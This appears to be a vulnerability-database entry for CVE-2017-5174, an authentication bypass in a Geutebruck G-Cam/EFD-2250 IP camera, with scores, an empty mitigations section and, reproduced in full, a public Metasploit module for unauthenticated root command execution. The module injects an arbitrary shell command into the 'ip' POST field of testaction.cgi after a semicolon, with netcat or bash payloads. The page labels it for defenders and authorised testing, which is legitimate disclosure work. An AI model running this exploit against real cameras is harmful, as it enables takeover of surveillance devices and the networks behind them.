CVE-2017-5174

critical

Published 2017-05-19 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

9.8

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access control that may allow remote code execution.

Predictions

Exploit likelihood

97%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-41360 webapps hardware verified ruby · 2 KB

RandoriSec · 2017-02-15

Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)

ruby exploit Source: Exploit-DB

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits a an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an
        anonymous user to execute arbitrary commands with root privileges.
        Firmware <= 1.11.0.12 are concerned.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.11.0.12 firmware.
      },
      'Author'         =>
        [
          'Davy Douhine',	#CVE-2017-5173 (RCE) and metasploit module
          'Florent Montel' 	#CVE-2017-5174 (Authentication bypass)
          'Frederic Cikala' #CVE-2017-5174 (Authentication bypass)
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-5173' ],
          [ 'CVE', '2017-5174' ],
          [ 'URL', 'http://geutebruck.com' ]
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat bash',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 16 2016'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/testaction.cgi']),
      ], self.class)
  end

  def exploit
    uri = normalize_uri(target_uri.path)
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    command = payload.encoded
    res = send_request_cgi(
      {
        'uri'    => uri,
        'method' => 'POST',
        'vars_post' => {
          'type' => "ip",
          'ip' => "eth0 1.1.1.1;#{command}",
        },
    })
  end

end

References

CWEs

CWE-288

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.